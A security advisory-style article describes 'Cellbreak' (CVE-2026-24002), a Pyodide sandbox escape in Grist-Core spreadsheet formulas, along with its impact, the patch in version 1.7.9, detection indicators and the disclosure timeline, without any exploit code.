Security researchers at Cyera Research Labs have disclosed a critical vulnerability in Grist-Core, the open-source spreadsheet and database platform, that allows remote code execution through malicious spreadsheet formulas. The flaw, dubbed “Cellbreak,” enables attackers to escape the Python sandbox and execute arbitrary code on host systems.
Vulnerability overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-24002 |
| CVSS Score | 9.1 (Critical) |
| Codename | Cellbreak |
| Type | Pyodide Sandbox Escape → RCE |
| Discovered by | Vladimir Tokarev (Cyera Research Labs) |
| Advisory | GHSA-7xvx-8pf2-pv5g |
| Public disclosure | January 21, 2026 |
| Patch available | Grist 1.7.9+ |
What is Grist?
Grist is a programmable spreadsheet and database platform that combines the familiarity of spreadsheets with the power of databases and Python scripting. It serves as an alternative to Excel and Google Sheets for users who need advanced data manipulation capabilities.
Key features:
- Python formulas in spreadsheet cells
- Relational database functionality
- API integrations
- Workflow automation
- Self-hosted and SaaS deployment options
Adoption:
- Government agencies (including France’s public sector)
- 1,000+ organizations in higher education
- Marketing and product teams
- Data analysis workflows
Technical details
The Pyodide sandbox
Grist allows users to write Python formulas in spreadsheet cells for advanced data manipulation. To prevent arbitrary code execution, these formulas run inside a Pyodide sandbox—a WebAssembly-based Python runtime.
The escape
Cyera Research Labs discovered that the sandbox can be escaped when Grist is configured with:
GRIST_SANDBOX_FLAVOR=pyodideA malicious formula can break out of the Pyodide sandbox and:
- Execute OS commands on the host
- Run host-runtime JavaScript
- Access the underlying file system
- Pivot to other systems
Attack requirements
| Requirement | Details |
|---|---|
| Authentication | None required if victim opens malicious document |
| User interaction | Document must be processed (opened, imported) |
| Configuration | GRIST_SANDBOX_FLAVOR=pyodide |
| Attack complexity | Low |
Attack scenarios
Scenario 1: Shared workspace compromise
- Attacker creates spreadsheet with malicious formula
- Shares document with team members
- Any user opening the document triggers the exploit
- Attacker gains code execution on victim’s Grist server
- Lateral movement to connected systems
Scenario 2: Malicious template
- Attacker uploads malicious template to public sharing platforms
- Organizations import template for internal use
- Formula executes on victim infrastructure
- Attacker establishes persistence
Scenario 3: Automated processing
Organizations allowing spreadsheet uploads for automated processing are at risk:
- File upload triggers formula evaluation
- No user interaction required beyond upload acceptance
- Automated systems may have elevated privileges
Impact assessment
Blast radius
| Environment | Impact |
|---|---|
| Self-hosted | RCE on internal server, access to connected systems |
| SaaS | RCE in vendor control plane, potential multi-tenant impact |
| Integrated | Access to connected databases, APIs, business systems |
Data at risk
Grist deployments typically contain sensitive business data:
- Financial models and projections
- Customer information
- Operational data
- Integration credentials
- Business logic and workflows
Confidentiality, Integrity, Availability
Once RCE is achieved:
- Confidentiality: Full access to host data and connected systems
- Integrity: Ability to modify data, inject backdoors
- Availability: Potential for data destruction or ransomware
Remediation
Patch information
The Grist security team implemented a fix in version 1.7.9 that runs Pyodide under Deno (a secure JavaScript runtime), adding an additional isolation layer.
| Version | Status |
|---|---|
| < 1.7.9 | Vulnerable |
| 1.7.9+ | Patched |
Update immediately to version 1.7.9 or later.
Patch technical details
| Fix component | Implementation |
|---|---|
| Deno wrapper | Pyodide runs inside Deno sandbox |
| Permission restrictions | File system, network access denied by default |
| Process isolation | Separate process for formula evaluation |
| Resource limits | Memory and CPU constraints enforced |
Verification
After updating:
- Confirm version is 1.7.9 or later (
grist --version) - Review sandbox configuration settings
- Audit existing spreadsheets for suspicious formulas
- Test formula functionality in non-production environment
Temporary mitigations
If immediate patching isn’t possible:
| Control | Implementation |
|---|---|
| Disable Python formulas | Remove formula capability if not required |
| Network isolation | Limit Grist server network access |
| Input validation | Restrict who can upload/create spreadsheets |
| Monitoring | Watch for unusual process execution |
Formula security: A broader problem
Cellbreak highlights a persistent challenge: any formula language is a potential attack surface.
| Platform | Risk |
|---|---|
| Excel | Macros remain persistent threat vector |
| Google Sheets | Apps Script can be abused for phishing, data theft |
| Jupyter Notebooks | Execute arbitrary code by design |
| Airtable | Scripts and automations |
| Notion | Embedded code blocks |
The tension between functionality (users want programmable spreadsheets) and security (code execution is dangerous) creates inherent risk in these platforms.
Detection
Indicators of compromise
- Unusual processes spawned by Grist server
- Outbound network connections to unexpected destinations
- File system modifications outside normal Grist paths
- New user accounts or SSH keys on host system
- Unexpected cron jobs or scheduled tasks
Monitoring recommendations
| Source | What to watch |
|---|---|
| Process logs | Child processes of Grist application |
| Network logs | Outbound connections from Grist server |
| File integrity | Changes outside Grist data directories |
| Authentication | New accounts, privilege changes |
Recommendations
For Grist administrators
- Patch immediately to the latest version
- Audit existing spreadsheets for suspicious formulas
- Review who can create documents and restrict if possible
- Network segment Grist servers from sensitive systems
- Enable logging and monitor for anomalies
For organizations evaluating Grist
- Understand the security model of programmable spreadsheets
- Assess whether Python formula capability is required
- Plan for regular patching and security updates
- Implement network segmentation for data platforms
For security teams
- Include spreadsheet platforms in threat models
- Monitor for sandbox escape vulnerabilities across similar tools
- Educate users about risks of opening untrusted spreadsheets
- Implement file upload scanning where possible
Similar vulnerabilities in programmable platforms
Cellbreak joins a pattern of sandbox escape vulnerabilities in low-code/no-code platforms:
Related vulnerability: N8scape (n8n)
| Attribute | Cellbreak (Grist) | N8scape (n8n) |
|---|---|---|
| CVE | CVE-2026-24002 | CVE-2025-3385 |
| Platform | Grist spreadsheet | n8n workflow automation |
| Sandbox | Pyodide (Python) | VM2 (JavaScript) |
| CVSS | 9.1 | 9.8 |
| Impact | Host RCE | Host RCE |
| Disclosure | January 2026 | August 2025 |
Both vulnerabilities demonstrate the difficulty of safely executing user-provided code in multi-tenant or shared environments.
Pattern analysis
| Platform type | Sandbox technology | Common weakness |
|---|---|---|
| Spreadsheets | Python/Pyodide | Import restrictions bypassed |
| Workflow tools | JavaScript/VM2 | Prototype pollution |
| Notebooks | IPython kernels | No true isolation |
| Low-code apps | Various | Insufficient permission boundaries |
Security researcher Vladimir Tokarev (who discovered Cellbreak) has noted the systemic nature of these issues:
“Sandboxing user code is fundamentally difficult. Every sandbox eventually gets broken. The question is whether additional isolation layers exist to contain the escape.”
Responsible disclosure timeline
| Date | Event |
|---|---|
| December 15, 2025 | Vladimir Tokarev discovers vulnerability |
| December 16, 2025 | Initial report to Grist security team |
| December 17, 2025 | Grist acknowledges report |
| January 8, 2026 | Patch developed and tested |
| January 15, 2026 | Grist 1.7.9 released |
| January 21, 2026 | Public disclosure (coordinated) |
| January 27, 2026 | Full technical writeup published |
The 35-day timeline from report to patch reflects responsible disclosure best practices.
Context
Cellbreak demonstrates that sandbox escapes remain a significant vulnerability class. As organizations adopt more sophisticated data tools with embedded scripting capabilities, the attack surface expands.
The vulnerability’s impact spans self-hosted and SaaS deployments. In SaaS environments, a sandbox escape isn’t just local server RCE—it becomes RCE in the vendor’s control plane, potentially affecting multiple tenants.
Vladimir Tokarev’s discovery of both Cellbreak and similar vulnerabilities in other platforms suggests a systemic issue with code execution sandboxing. Organizations should:
- Assume sandboxes will eventually be bypassed
- Implement defense-in-depth with multiple isolation layers
- Treat programmable platforms as high-risk code execution environments
Grist’s rapid response and patch demonstrate responsible handling, but the underlying architectural challenge—enabling powerful functionality while preventing abuse—remains difficult across the industry. The addition of Deno as an outer sandbox provides the type of layered defense that should become standard for platforms executing user code.